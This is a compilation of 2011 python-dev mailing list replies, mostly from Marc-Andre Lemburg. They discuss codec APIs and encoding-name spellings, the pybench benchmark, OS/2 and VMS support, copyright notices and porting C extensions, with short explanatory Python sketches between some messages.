Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader
Victor Stinner wrote:

On Tuesday 24 May 2011 at 10:03 +0200, M.-A. Lemburg wrote:

Please read PEP 100 regarding StreamReader and StreamWriter. Those codec parts were explicitly designed to be stateful, unlike the stateless encoder/decoder methods.

Yes, it is possible to implement stateful StreamReader and StreamWriter classes and we have such codecs (I gave the example of UTF-16), but the state is not exposed (getstate / setstate), and so it's not possible to write generic code to handle the codec state in the base StreamReader and StreamWriter classes. io.TextIOWrapper requires encoder.setstate(0) for example.

So instead of always suggesting to deprecate everything, how about you come up with a proposal to add meaningful new methods to those base classes?

Each codec can, however, implement variants which are optimized for the specific encoding or intercept certain stream methods to add functionality or improve the encoding/decoding performance.

Can you give me some examples?

See the UTF-16 codec in the stdlib for example. This uses some of the available possibilities to interpret the BOM mark and then switches the encoder/decoder methods accordingly.

A lot more could be done for other variable length encoding codecs, e.g. UTF-8, since these often have problems near the end of a read due to missing bytes. The base class provides a general purpose implementation to cover the case, but it's not efficient, since it doesn't know anything about the encoding characteristics. Such an implementation would have to be done per codec and that's why we have per codec StreamReader/Writer APIs.

TextIOWrapper and StreamReaderWriter are merely wrappers around streams that make use of the codecs. They don't provide any codec logic themselves. That's the conceptual difference. ... StreamReader and StreamWriter ... work efficiently and directly on streams rather than buffers.

StreamReader, StreamWriter, TextIOWrapper and StreamReaderWriter all have a file-like API: tell(), seek(), read(), readline(), write(), etc. The implementation is maybe different, but the API is just the same, and so the use cases are just the same. I don't see in which case I should use StreamReader or StreamWriter instead of TextIOWrapper. I thought that TextIOWrapper was specific to files on disk, but TextIOWrapper is already used for other purposes like sockets.

I have no idea why TextIOWrapper was added to the stdlib instead of making StreamReaderWriter more capable, since StreamReaderWriter had already been available in Python since Python 1.6 (and this is being used by codecs.open()). Perhaps we should deprecate TextIOWrapper instead and replace it with codecs.StreamReaderWriter? ;-)

Seriously, I don't see use of TextIOWrapper as an argument for removing the StreamReader/Writer parts of the codecs API.

Here's my reply from the ticket regarding using incremental encoders/decoders for the StreamReader/Writer parts of the codec set of APIs: The point about having them use incremental codecs for encoding and decoding is a good one and would need to be investigated. If possible, we could use incremental encoders/decoders for the standard StreamReader/Writer base classes or add new IncrementalStreamReader/Writer classes which then use the IncrementalEncode/Decoder per default.

Why do you want to write a duplicate feature? TextIOWrapper is already here, it's working and widely used.

See above and please also try to understand why we have per-codec implementations for streams. I'm tired of repeating myself. I would much prefer to see the codec-specific functionality in TextIOWrapper added back to the codecs where it belongs.

I am working on codec issues (like CJK encodings, see #12100, #12057, #12016) and I would like to remove StreamReader and StreamWriter to have *less* code to maintain. If you want to add more code, will you be available to maintain it? It looks like you are busy; some people (not me ;-)) are still waiting for .transform()/.untransform()!

I dropped the ball on the idea after the strong wave of comments against those methods. People will simply have to use codecs.encode() and codecs.decode().

-- Marc-Andre Lemburg eGenix.com (#1, May 24 2011)
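For readers who have not used the module-level functions mentioned at the end of this message, here is a small sketch of codecs.encode() and codecs.decode() with codecs that are not text encodings. The codec names rot_13 and base64 are standard library codecs; the sample strings are arbitrary.

```python
import codecs

# str -> str codec: rot_13 works on text rather than bytes
rot = codecs.encode("hello world", "rot_13")

# bytes -> bytes codec: base64 takes and returns bytes
b64 = codecs.encode(b"hello world", "base64")
back = codecs.decode(b64, "base64")

print(rot)
print(b64)
print(back)
```

Unlike str.encode() and bytes.decode(), these functions do not restrict the input and output types; the codec itself decides what it accepts.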
Re: [Python-Dev] [Python-checkins] cpython (3.2): Avoid codec spelling issues by just using the utf-8 default.
Raymond Hettinger wrote:

On May 5, 2011, at 11:41 AM, Benjamin Peterson wrote:

2011/5/5 raymond.hettinger python-check...@python.org:

http://hg.python.org/cpython/rev/1a56775c6e54
changeset: 69857:1a56775c6e54
branch: 3.2
parent: 69855:97a4855202b8
user: Raymond Hettinger pyt...@rcn.com
date: Thu May 05 11:35:50 2011 -0700
summary: Avoid codec spelling issues by just using the utf-8 default.

Out of curiosity, what is the issue?

IIRC, the performance depended on how you spelled it. I believe that is why the spelling got changed in Py3.3.

Not really. It got changed because we have canonical names for the codecs which the stdlib should use rather than rely on aliases. Performance-wise it only makes a difference if you use it in tight loops.

Either way, the code is simpler by just using the default.

... as long as the casual reader knows what the default is :-) I think it's better to make the choice explicit if the code relies on a particular non-ASCII encoding. If it doesn't, then the default is fine.

-- Marc-Andre Lemburg eGenix.com (#1, May 06 2011)
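The distinction between canonical codec names and aliases can be seen with codecs.lookup(). The sketch below is an added illustration; the list of spellings is just a sample of aliases the standard library accepts for UTF-8.

```python
import codecs

spellings = ("utf8", "UTF-8", "utf_8", "U8")

# Every alias resolves to the same codec, which reports its canonical name.
canonical = [codecs.lookup(s).name for s in spellings]
print(canonical)

# In Python 3, leaving the encoding out of str.encode() means UTF-8.
implicit = "\u00e9".encode()
explicit = "\u00e9".encode("utf-8")
print(implicit == explicit)
```

Spelling the name out costs nothing here and tells the casual reader which encoding the code depends on.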
Re: [Python-Dev] Convert Py_Buffer to Py_UNICODE
Sijin Joseph wrote:
> Hi - I am working on a patch where I have an argument that can either be a unicode string or binary data. I parse the argument using the PyArg_ParseTuple method using the s* format specification and get a Py_buffer. I now need to convert this Py_buffer object to a Py_UNICODE and pass it into a function. What is the best way to do this? If I determine that the passed argument was binary using another flag parameter, then I am passing Py_buffer->buf as a pointer to the start of the data.

I don't understand why you'd want to convert PyUnicode to PyBytes (encoded as UTF-8), only to decode it again afterwards in order to pass it to some other PyUnicode API.

It'd be more efficient to use the O parser marker and then use PyObject_GetBuffer() to convert non-PyUnicode objects to a Py_buffer.

> This is in the winsound module, here's the relevant code snippet:
>
> sound_playsound(PyObject *s, PyObject *args)
> {
>     Py_buffer *buffer;
>     int flags;
>     int ok;
>     LPCWSTR pszSound;
>
>     if (PyArg_ParseTuple(args, "s*i:PlaySound", &buffer, &flags)) {
>         if (flags & SND_ASYNC && flags & SND_MEMORY) {
>             /* Sidestep reference counting headache; unfortunately this also
>                prevents SND_LOOP from memory. */
>             PyBuffer_Release(buffer);
>             PyErr_SetString(PyExc_RuntimeError,
>                             "Cannot play asynchronously from memory");
>             return NULL;
>         }
>         if (flags & SND_MEMORY) {
>             pszSound = buffer->buf;
>         }
>         else {
>             /* pszSound = ; */
>         }
>
> -- Sijin

--
Marc-Andre Lemburg
eGenix.com (#1, May 02 2011)
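The advice above (look at the object first, and only ask for a buffer when it is not a text string) can be illustrated at the Python level. This is only an analogy to the C-level "O" marker plus PyObject_GetBuffer(); the function name classify_sound is made up for this sketch and is not part of winsound.

```python
def classify_sound(sound):
    """Return ("text", str) for names, ("binary", bytes) for in-memory data."""
    if isinstance(sound, str):
        # Text stays text: no round trip through an encoded byte string.
        return "text", sound
    # memoryview() uses the buffer protocol and raises TypeError
    # for objects that do not support it.
    with memoryview(sound) as view:
        return "binary", view.tobytes()


print(classify_sound("alarm.wav"))
print(classify_sound(bytearray(b"RIFF")))
```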
Re: [Python-Dev] Proposal for a common benchmark suite
Mark Shannon wrote:
> Maciej Fijalkowski wrote:
>> On Thu, Apr 28, 2011 at 11:10 PM, Stefan Behnel stefan...@behnel.de wrote:
>>> M.-A. Lemburg, 28.04.2011 22:23:
>>>> Stefan Behnel wrote:
>>>>> DasIch, 28.04.2011 20:55:
>>>>>> the CPython benchmarks have an extensive set of microbenchmarks in the pybench package
>>>>>
>>>>> Try not to care too much about pybench. There is some value in it, but some of its microbenchmarks are also tied to CPython's interpreter behaviour. For example, the benchmarks for literals can easily be considered dead code by other Python implementations so that they may end up optimising the benchmarked code away completely, or at least partially. That makes a comparison of the results somewhat pointless.
>>>>
>>>> The point of the micro benchmarks in pybench is to be able to compare them one-by-one, not by looking at the sum of the tests.
>>>>
>>>> If one implementation optimizes away some parts, then the comparison will show this fact very clearly - and that's the whole point.
>>>>
>>>> Taking the sum of the micro benchmarks only has some meaning as a very rough indicator of improvement. That's why I wrote pybench: to get a better, more detailed picture of what's happening, rather than trying to find some way of measuring average use.
>>>>
>>>> This average is very different depending on where you look: for some applications method calls may be very important, for others, arithmetic operations, and yet others may have more need for fast attribute lookup.
>>>
>>> I wasn't talking about averages or sums, and I also wasn't trying to put down pybench in general. As it stands, it makes sense as a benchmark for CPython.
>>>
>>> However, I'm arguing that a substantial part of it does not make sense as a benchmark for PyPy and others. With Cython, I couldn't get some of the literal arithmetic benchmarks to run at all. The runner script simply bails out with an error when the benchmarks accidentally run faster than the initial empty loop. I imagine that PyPy would eventually even drop the loop itself, thus leaving nothing to compare. Does that tell us that PyPy is faster than Cython for arithmetic? I don't think it does.
>>>
>>> When I see that a benchmark shows that one implementation runs in 100% less time than another, I simply go *shrug* and look for a better benchmark to compare the two.
>>
>> I second here what Stefan says. This sort of benchmark might be useful for CPython, but it's not particularly useful for PyPy or for comparisons (or any other implementation which tries harder to optimize stuff away). For example a method call in PyPy would be inlined and completely removed if the method is empty, which does not measure method call overhead at all. That's why we settled on medium-to-large examples where it's more of an average of possible scenarios than just one.
>
> If CPython were to start incorporating any specialising optimisations, pybench wouldn't be much use for CPython. The Unladen Swallow folks didn't like pybench as a benchmark.

This is all true, but I think there's a general misunderstanding of what pybench is.

I wrote pybench in 1997 when I was working on optimizing the Python 1.5 implementation for use in a web application server. At the time, we had pystone and that was a really poor benchmark for determining whether certain optimizations in the Python VM and compiler made sense or not.

pybench was then improved and extended over the course of several years and then added to Python 2.5 in 2006.

The benchmark is written as a framework for micro benchmarks based on the assumption of a non-optimizing (byte code) compiler. As such it may or may not work with an optimizing compiler. The calibration part would likely have to be disabled for an optimizing compiler (run with -C 0) and a new set of benchmark tests would have to be added; one which tests the Python implementation at a higher level than the existing tests.

That last part is something people tend to forget: pybench is not a monolithic application with a predefined and fixed set of tests. It's a framework that can be extended as needed. All you have to do is add a new module with test classes and import it in Setup.py.

--
Marc-Andre Lemburg
eGenix.com (#1, Apr 29 2011)
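To make the calibration point concrete, here is a small stand-alone sketch of the idea: time the test loop, time an empty loop of the same length, and subtract. It is not pybench's code; the class names MicroBenchmark and AttributeLookup and the run() method are assumptions made for this illustration only.

```python
import time


class MicroBenchmark:
    """Hypothetical stand-in for a micro benchmark with calibration."""

    rounds = 100_000

    def test(self):
        # Subclasses put the operation under test inside this loop.
        for _ in range(self.rounds):
            pass

    def calibrate(self):
        # Same loop without the operation: measures loop overhead only.
        for _ in range(self.rounds):
            pass

    def run(self, calibrate=True):
        start = time.perf_counter()
        self.test()
        elapsed = time.perf_counter() - start

        overhead = 0.0
        if calibrate:
            start = time.perf_counter()
            self.calibrate()
            overhead = time.perf_counter() - start
        # With an optimizing implementation the test loop may be as fast as
        # (or faster than) the empty loop, so this difference can be <= 0.
        return elapsed - overhead


class AttributeLookup(MicroBenchmark):
    def test(self):
        obj = self
        for _ in range(self.rounds):
            obj.rounds
            obj.rounds
            obj.rounds


raw = AttributeLookup().run(calibrate=False)
net = AttributeLookup().run(calibrate=True)
print("raw: %.6fs  net of loop overhead: %.6fs" % (raw, net))
```

Skipping the subtraction, as in the calibrate=False call, is the rough equivalent of what running with calibration disabled is meant to achieve: the result is then always a plain, positive wall-clock time.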
Re: [Python-Dev] Proposal for a common benchmark suite
DasIch wrote:
> Given those facts I think including pybench is a mistake. It does not allow for a fair or meaningful comparison between implementations which is one of the things the suite is supposed to be used for in the future.
>
> This easily leads to misinterpretation of the results from this particular benchmark and it negatively affects the performance data as a whole.
>
> The same applies to several Unladen Swallow microbenchmarks such as bm_call_method_*, bm_call_simple and bm_unpack_sequence.

I don't think we should exclude any implementation specific benchmarks from a common suite.

They will not necessarily allow for comparisons between implementations, but will provide important information about the progress made in optimizing a particular implementation.

--
Marc-Andre Lemburg
eGenix.com (#1, Apr 29 2011)
Re: [Python-Dev] Proposal for a common benchmark suite
Stefan Behnel wrote:
> DasIch, 28.04.2011 20:55:
>> the CPython benchmarks have an extensive set of microbenchmarks in the pybench package
>
> Try not to care too much about pybench. There is some value in it, but some of its microbenchmarks are also tied to CPython's interpreter behaviour. For example, the benchmarks for literals can easily be considered dead code by other Python implementations so that they may end up optimising the benchmarked code away completely, or at least partially. That makes a comparison of the results somewhat pointless.

The point of the micro benchmarks in pybench is to be able to compare them one-by-one, not by looking at the sum of the tests.

If one implementation optimizes away some parts, then the comparison will show this fact very clearly - and that's the whole point.

Taking the sum of the micro benchmarks only has some meaning as a very rough indicator of improvement. That's why I wrote pybench: to get a better, more detailed picture of what's happening, rather than trying to find some way of measuring average use.

This average is very different depending on where you look: for some applications method calls may be very important, for others, arithmetic operations, and yet others may have more need for fast attribute lookup.

--
Marc-Andre Lemburg
eGenix.com (#1, Apr 28 2011)
Re: [Python-Dev] Drop OS/2 and VMS support?
Victor Stinner wrote:
> Hi,
>
> I asked one year ago if we should drop OS/2 support: Andrew MacIntyre, our OS/2 maintainer, answered:
> http://mail.python.org/pipermail/python-dev/2010-April/099477.html
>
> Extract: "The 3.x branch needs quite a bit of work on OS/2 to deal with Unicode, as OS/2 was one of the earlier OSes with full multiple language support and IBM developed a unique API. I'm still struggling to come to terms with this, partly because I myself don't need it."
>
> So one year later, Python 3 still does not support OS/2.
>
> --
>
> About VMS: I don't know if anyone is using Python (2 or 3) on VMS, or if Python 3 does work on VMS. I bet that it just does not compile :-)
>
> I don't know anyone using VMS or OS/2.
>
> --
>
> There are 39 #ifdef VMS and 52 #ifdef OS2. We can keep them and wait until someone works on these OSes to ensure that the test suite passes. But if nobody cares about these OSes and nobody wants to maintain them, it would be easier for the maintenance of the Python source code base to remove the specific code.
>
> Well, not remove directly, but plan to remove it using the PEP 11 procedure (mark OS/2 and VMS as unsupported, and remove the code in Python 3.4).

The Python core team is not really representative of the Python community users, so I think this needs a different approach:

Instead of simply deprecating OSes without notice to the general Python community, how about doing a call for support for these OSes?

If that doesn't turn up maintainers, then we can take the PEP 11 route.

FWIW: There's still a fan-base out there for OS/2 and its successor eComStation:

http://en.wikipedia.org/wiki/EComStation
http://www.ecomstation.com/ecomstation20.phtml
http://www.warpstock.eu/

Same for VMS in the form of OpenVMS:

http://en.wikipedia.org/wiki/OpenVMS
http://h71000.www7.hp.com/index.html?jumpid=/go/openvms
http://www.vmspython.org/

--
Marc-Andre Lemburg
eGenix.com (#1, Apr 19 2011)
Re: [Python-Dev] Drop OS/2 and VMS support?
Doug Hellmann wrote:
> On Apr 19, 2011, at 10:36 AM, M.-A. Lemburg wrote:
>> Victor Stinner wrote:
>>> Hi,
>>>
>>> I asked one year ago if we should drop OS/2 support: Andrew MacIntyre, our OS/2 maintainer, answered:
>>> http://mail.python.org/pipermail/python-dev/2010-April/099477.html
>>>
>>> Extract: "The 3.x branch needs quite a bit of work on OS/2 to deal with Unicode, as OS/2 was one of the earlier OSes with full multiple language support and IBM developed a unique API. I'm still struggling to come to terms with this, partly because I myself don't need it."
>>>
>>> So one year later, Python 3 still does not support OS/2.
>>>
>>> --
>>>
>>> About VMS: I don't know if anyone is using Python (2 or 3) on VMS, or if Python 3 does work on VMS. I bet that it just does not compile :-)
>>>
>>> I don't know anyone using VMS or OS/2.
>>>
>>> --
>>>
>>> There are 39 #ifdef VMS and 52 #ifdef OS2. We can keep them and wait until someone works on these OSes to ensure that the test suite passes. But if nobody cares about these OSes and nobody wants to maintain them, it would be easier for the maintenance of the Python source code base to remove the specific code.
>>>
>>> Well, not remove directly, but plan to remove it using the PEP 11 procedure (mark OS/2 and VMS as unsupported, and remove the code in Python 3.4).
>>
>> The Python core team is not really representative of the Python community users, so I think this needs a different approach:
>>
>> Instead of simply deprecating OSes without notice to the general Python community, how about doing a call for support for these OSes?
>>
>> If that doesn't turn up maintainers, then we can take the PEP 11 route.
>
> Victor, if you want to post the call for support to Python Insider, let me know off list and I will set you up with access.

I can help with that if you like.

--
Marc-Andre Lemburg
eGenix.com (#1, Apr 19 2011)
Re: [Python-Dev] Replace useless %.100s by %s in PyErr_Format()
Victor Stinner wrote:
> On Thursday, 24 March 2011 at 13:22 +0100, M.-A. Lemburg wrote:
>> BTW: Why do you think that %.100s is not supported in PyErr_Format() in Python 2.x? PyString_FromFormatV() does support this. The change to use Unicode error strings introduced the problem, since PyUnicode_FromFormatV() for some reason ignores the precision (which it shouldn't).
>
> Oh... You are right, it is a regression in Python 3. We started to write unit tests for PyBytes_FromFormat() and PyUnicode_FromFormat(), I hope that they will improve the situation.
>
>> That said, it's a good idea to add the #7330 fix to at least Python 2.7 as well, since ignoring the precision is definitely a bug. It may even be security relevant, since it could be used for DOS attacks on servers (e.g. causing them to write huge strings to log files instead of just a few hundred bytes per message), so may even need to go into Python 2.6.
>
> Python 2 is not affected because PyErr_Format() uses PyString_FromFormatV() which supports precision for the %s format (e.g. %.100s truncates the string to 100 bytes).

Right, but the PyUnicode_FromFormatV() which ignores the precision is still present in Python 2.6 and 2.7, even though it is not used by PyErr_Format().

> Do you think that Python 3.1-3.3 should be fixed?

Yes, indeed. The above mentioned security threat is real. The CPython code only has a few cases where this could be used for a DOS (e.g. in the pickle module or the AST code), but since this function is used in 3rd party extensions, those are affected indirectly as well.

Thanks,
--
Marc-Andre Lemburg
eGenix.com (#1, Mar 30 2011)
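What the precision in %.100s is supposed to do can be shown with Python's own % operator, which honours it for strings. This is only a Python-level illustration of the intended C-level behaviour; the message text and the variable names are made up.

```python
# An attacker-controlled value, e.g. a very long type or attribute name.
hostile_name = "x" * 10_000

# With a precision, at most 100 characters of the value are copied.
bounded = "expected int, got %.100s" % hostile_name

# Without it, the whole value ends up in the message (and in the log file).
unbounded = "expected int, got %s" % hostile_name

print(len(bounded), len(unbounded))
```

A formatting function that silently ignores the precision behaves like the second case even though the format string asked for the first.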
Re: [Python-Dev] Copyright notices
Nadeem Vawda wrote:
> I was wondering what the policy is regarding copyright notices and license boilerplate text at the top of source files.
>
> I am currently rewriting the bz2 module (see http://bugs.python.org/issue5863), splitting the existing Modules/bz2module.c into Modules/_bz2module.c and Lib/bz2.py.
>
> Are new files expected to include a copyright notice and/or license boilerplate text?

Since you'll be adding new IP to Python, the new code you write should contain your copyright and the standard PSF contributor agreement notice, e.g.

    (c) Copyright 2011 by Nadeem Vawda. Licensed to PSF under a Contributor Agreement.

(please also make sure you have sent the signed agreement to the PSF; see http://www.python.org/psf/contrib/)

We don't have a general copyright or license boilerplate for Python source files.

> Also, is it necessary for _bz2module.c (new) to retain the copyright notices from bz2module.c (old)? In the tracker issue, Antoine said he didn't think so, but suggested that I get some additional opinions.

If the file copies significant code parts from older files, the copyright notices from those files will have to be added to the file comment as well - ideally with a note explaining to which parts those copyrights apply and where they originated.

If you are replacing the old implementation with a new one, you don't need to copy over the old copyright statements.

Thanks,
--
Marc-Andre Lemburg
eGenix.com (#1, Mar 21 2011)
Re: [Python-Dev] Improvements for Porting C Extension from 2 to 3
Sümer Cip wrote:
> Hi,
>
> While porting a C extension from 2 to 3, I realized that there are some general cases which can be automated. For example, for my specific application (yappi - http://code.google.com/p/yappi/), all I need to do is the following things:
>
> 1) define PyModuleDef
> 2) change PyString_AS_STRING calls to _PyUnicode_AsString

Aside: Please don't use private APIs in Python extensions. Esp. the above Unicode API is likely going to be phased out.

You're better off using PyUnicode_AsUTF8String() instead and then leaving the PyString_AS_STRING() macro in place.

> 3) change module init code a little.
>
> It occurred to me that all these kinds of standard changes can be automated via a script.
>
> Not sure on the usability of this however, because of my limited knowledge on the area.
>
> Is such a tool worth implementing?

I'm not sure whether you can really automate this: The change from 8-bit strings to Unicode support usually requires reconsidering whether you're dealing with plain text, encoded text data or binary data.

However, a guide of what to replace and how to change the code would probably help a lot.

Please share your thoughts on the python-porting mailing list and/or add to these wiki pages:

http://wiki.python.org/moin/PortingToPy3k
http://wiki.python.org/moin/PortingExtensionModulesToPy3k

Thanks,
--
Marc-Andre Lemburg
eGenix.com (#1, Mar 03 2011)
Re: [Python-Dev] Strange error importing a Pickle from 2.7 to 3.2
Alexander Belopolsky wrote:
> On Wed, Feb 23, 2011 at 6:32 PM, M.-A. Lemburg m...@egenix.com wrote:
>> Alexander Belopolsky wrote:
>>> ..
>>> In what sense is Latin-1 the official name? The IANA charset registry has the following listing
>>>
>>> Name: ISO_8859-1:1987 [RFC1345,KXS2]
>>> MIBenum: 4
>>> Source: ECMA registry
>>> Alias: iso-ir-100
>>> Alias: ISO_8859-1
>>> Alias: ISO-8859-1 (preferred MIME name)
>>> Alias: latin1
>>> ..
>>
>> Latin-1 is short for Latin Alphabet No. 1 and started out as ECMA-94 in 1985 and 1986:
>
> This does not explain your preference of Latin-1 over Latin1.

This is not my preference. See e.g. Wikipedia:

http://en.wikipedia.org/wiki/ISO/IEC_8859-1

It is common practice to replace spaces in descriptive names with a hyphen to come up with an identifier string (even Google does or undoes this when searching the net). Replacing spaces with an empty string is also an option, but doesn't read as well.

> Both are perfectly valid abbreviations for Latin Alphabet No. 1. The spelling without - has the advantage of being a valid Python identifier and a module name.

The hyphens are converted to underscores by the lookup function in the encodings package. That turns the name into a valid Python module name.

> The IANA registration for latin1 and lack of that for latin-1 most likely indicates that the former is more commonly found in machine readable metadata.

I don't know why you put so much emphasis on machine readable metadata. Python source code is machine readable, the Internet is machine readable, all documents found there are machine readable.

As I said earlier on: the IANA registry is just that - a registry of names with the purpose of avoiding name clashes in the resp. name space. As such, it is not a standard, but merely a tool to map various aliases to a canonical name.

The fact that an alias is registered doesn't allow any implication on whether it's in wide-spread use or not, e.g. csISOLatin1 gives me 6810 hits on Google.

I get 788,000 hits for 'latin1 -latin-1' on Google, 'latin-1' gives 2,600,000 hits. Looks like it's still the preferred way to write that encoding name.

--
Marc-Andre Lemburg
eGenix.com (#1, Feb 24 2011)
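The normalization step mentioned above can be observed from Python. A minimal sketch, assuming a current CPython 3 where encodings.normalize_encoding() and encodings.aliases are available; the list of spellings is just a sample.

```python
import codecs
import encodings
from encodings.aliases import aliases

spellings = ["latin-1", "latin1", "Latin-1", "iso-8859-1"]

for spelling in spellings:
    # Hyphens (and other punctuation) become underscores, which gives a
    # string usable as a module name inside the encodings package.
    normalized = encodings.normalize_encoding(spelling)
    # codecs.lookup() resolves aliases and reports the codec's own name.
    codec_name = codecs.lookup(spelling).name
    print("%-12s -> %-12s -> %s" % (spelling, normalized, codec_name))

# The alias table maps the hyphen-less spelling onto the same module.
print(aliases["latin1"])
```

All four spellings end up at the same codec, so the choice between them is about readability and lookup cost, not about behaviour.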
Re: [Python-Dev] Strange error importing a Pickle from 2.7 to 3.2
Alexander Belopolsky wrote:
> On Wed, Feb 23, 2011 at 4:07 PM, Guido van Rossum gu...@python.org wrote:
>> I'm guessing that one of these encoding names is recognized by the C code while the other one takes the slow path via the aliasing code.
>
> This is absolutely right. In fact I am going to propose adding strcmp(lower, "latin1") to the following test in PyUnicode_AsEncodedString():
>
>     else if ((strcmp(lower, "latin-1") == 0) ||
>              (strcmp(lower, "iso-8859-1") == 0))
>         return PyUnicode_EncodeLatin1(...
>
> I'll open a separate issue for that. In Python's own stdlib and tests latin1 is a more common spelling than latin-1, so it makes sense to optimize it.

Latin-1 is the official name and the one used internally by Python, so it would be good to have the test suite and Python code in general use that variant of the name (just as utf-8 is preferred over utf8).

Instead of adding more aliases to the C code, please change the encoding names in the stdlib and test suite.

Thanks,
--
Marc-Andre Lemburg
eGenix.com (#1, Feb 23 2011)
Re: [Python-Dev] Strange error importing a Pickle from 2.7 to 3.2
Alexander Belopolsky wrote:
> On Wed, Feb 23, 2011 at 4:23 PM, M.-A. Lemburg m...@egenix.com wrote:
> ..
>> Latin-1 is the official name and the one used internally by Python, so it would be good to have the test suite and Python code in general use that variant of the name (just as utf-8 is preferred over utf8).
>>
>> Instead of adding more aliases to the C code, please change the encoding names in the stdlib and test suite.
>
> I cannot agree with you on this one. Official or not, latin-1 is much less commonly used than latin1. Currently decode("latin1") is 10x slower than decode("latin-1") on short strings. We already have a check for the iso-8859-1 alias in PyUnicode_AsEncodedString(). Adding latin1 (and possibly utf8 as well) is likely to speed up many applications at minimal cost.

Fair enough, then add latin1 and utf8 to both PyUnicode_Decode() and PyUnicode_AsEncodedString().

Still, the stdlib and test suite should be examples of using the correct names.

I only found these few cases where the wrong Latin-1 name is used in the stdlib:

./distutils/command/bdist_wininst.py:
-- # convert back to bytes. "latin1" simply avoids any possible
-- encoding="latin1") as script:
-- script_data = script.read().encode("latin1")
./urllib/request.py:
-- data = base64.decodebytes(data.encode('ascii')).decode('latin1')
./asynchat.py:
-- encoding = 'latin1'
./ftplib.py:
-- encoding = "latin1"
./sre_parse.py:
-- encode = lambda x: x.encode('latin1')

I get 12 hits for the test suite.

Yet 108 for the correct name, so I can't follow your statement that the wrong variant is used more often.

--
Marc-Andre Lemburg
eGenix.com (#1, Feb 23 2011)
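Whether a given spelling takes a slower path on a particular interpreter can be checked with a quick timing run. This is a rough sketch only; the numbers depend entirely on the Python version and machine, and the 10x figure quoted above refers to the 2011 code base, not necessarily to current releases.

```python
import timeit

data = b"short string"
timings = {}

for spelling in ("latin-1", "latin1", "iso-8859-1"):
    # Decode the same short byte string many times with each spelling.
    timings[spelling] = timeit.timeit(
        lambda: data.decode(spelling), number=200_000
    )

for spelling, seconds in timings.items():
    print("%-12s %.4f s" % (spelling, seconds))
```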
Re: [Python-Dev] Strange error importing a Pickle from 2.7 to 3.2
Alexander Belopolsky wrote:
> On Wed, Feb 23, 2011 at 4:54 PM, M.-A. Lemburg m...@egenix.com wrote:
> ..
>> Yet 108 for the correct name, so I can't follow your statement that the wrong variant is used more often.
>
> Hmm, your grepping skills are probably better than mine. I get
>
> $ grep -iw latin-1 Lib/*.py | wc -l
> 24
>
> and
>
> $ grep -iw latin1 Lib/test/*.py | wc -l
> 25
>
> (I did get spurious hits with naive grep latin1, so I retract my "more often" claim and just say that both spellings are equally common.)

I used a Python script based on re, perhaps that's why :-)

grep piped into wc -l only counts lines, not multiple instances on a single line. Looking through the hits I found, there are also a few false positives such as 'latin-10' or 'iso-latin-1'. Without those, I get 83 hits.

If you open a ticket for this, I'll add the list of hits to that ticket.

--
Marc-Andre Lemburg
eGenix.com (#1, Feb 23 2011)
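The difference between counting matching lines and counting individual occurrences is easy to reproduce. The following is a small sketch of an re-based counter, not the script referred to above; the pattern and the sample text are assumptions chosen to show the two effects mentioned (several hits on one line, and look-alikes such as 'latin-10' or 'iso-latin-1').

```python
import re

# "latin-1", case-insensitive, but not as part of a longer name such as
# "latin-10" or "iso-latin-1".
PATTERN = re.compile(r"(?<![\w-])latin-1(?![\w-])", re.IGNORECASE)


def count_occurrences(text):
    """Count every individual match, even several on one line."""
    return len(PATTERN.findall(text))


def count_matching_lines(text):
    """Count lines with at least one match (what grep | wc -l reports)."""
    return sum(1 for line in text.splitlines() if PATTERN.search(line))


sample = "\n".join([
    "x.encode('latin-1'); y.decode('latin-1')",  # two hits on one line
    "codec = 'latin-10'",                        # different encoding
    "alias = 'iso-latin-1'",                     # longer alias
    "name = 'Latin-1'",                          # one hit
])

print(count_occurrences(sample), count_matching_lines(sample))
```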
Re: [Python-Dev] Strange error importing a Pickle from 2.7 to 3.2
Alexander Belopolsky wrote:
On Wed, Feb 23, 2011 at 4:23 PM, M.-A. Lemburg m...@egenix.com wrote: .. Latin-1 is the official name and the one used internally by Python,
In what sense is Latin-1 the official name? The IANA charset registry has the following listing
Name: ISO_8859-1:1987 [RFC1345,KXS2]
MIBenum: 4
Source: ECMA registry
Alias: iso-ir-100
Alias: ISO_8859-1
Alias: ISO-8859-1 (preferred MIME name)
Alias: latin1
Alias: l1
Alias: IBM819
Alias: CP819
Alias: csISOLatin1
(See http://www.iana.org/assignments/character-sets)
Those are registered character set names, not necessarily standard names. Anyone can apply for new aliases to get added to that list.
Latin-1 spelling does appear in various unicode.org documents, but not in machine readable files as far as I can tell.
Latin-1 is short for Latin Alphabet No. 1 and started out as ECMA-94 in 1985 and 1986: http://www.ecma-international.org/publications/standards/Ecma-094.htm
ISO then applied their numbering scheme for the character set standard ISO-8859 in 1987 where Latin-1 became ISO-8859-1. Note that this was before the Internet took off.
I assume that since the HTML standard used the more popular name Latin-1 for its definition of the default character set and also made use of the term throughout the spec, it became the de-facto standard name for that character set at the time. I only learned about the term ISO-8859-1 when starting to dive into the Unicode world late in the 1990s.
Latin-1 is also sometimes written as ISO Latin-1, e.g. http://msdn.microsoft.com/en-us/library/ms537495(v=vs.85).aspx
For much the same reasons, ISO-10646 never really became popular, but Unicode eventually did. ECMA-262 or ISO/IEC 16262 just doesn't sound as good as JavaScript either :-)
-- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Feb 23 2011)
Python/Zope Consulting and Support ... http://www.egenix.com/
mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
mxODBC, mxDateTime, mxTextTools ... http://python.egenix.com/
::: Try our new mxODBC.Connect Python Database Interface for free !
eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/
___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
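As a rough illustration of the naming question in this message, the sketch below asks Python's own codec registry to resolve several of the spellings from the IANA listing. It relies only on `codecs.lookup()`; the choice of spellings is mine, and the canonical name the registry reports is deliberately not hard-coded, since it is an implementation detail.

```python
import codecs

# Spellings taken from the IANA listing quoted in the message, plus "latin-1".
SPELLINGS = [
    "latin-1", "latin1", "l1", "iso-8859-1", "iso_8859-1",
    "iso-ir-100", "ibm819", "cp819", "csisolatin1",
]

def canonical_names(spellings):
    """Return the set of canonical codec names the registry maps the spellings to."""
    return {codecs.lookup(spelling).name for spelling in spellings}

names = canonical_names(SPELLINGS)
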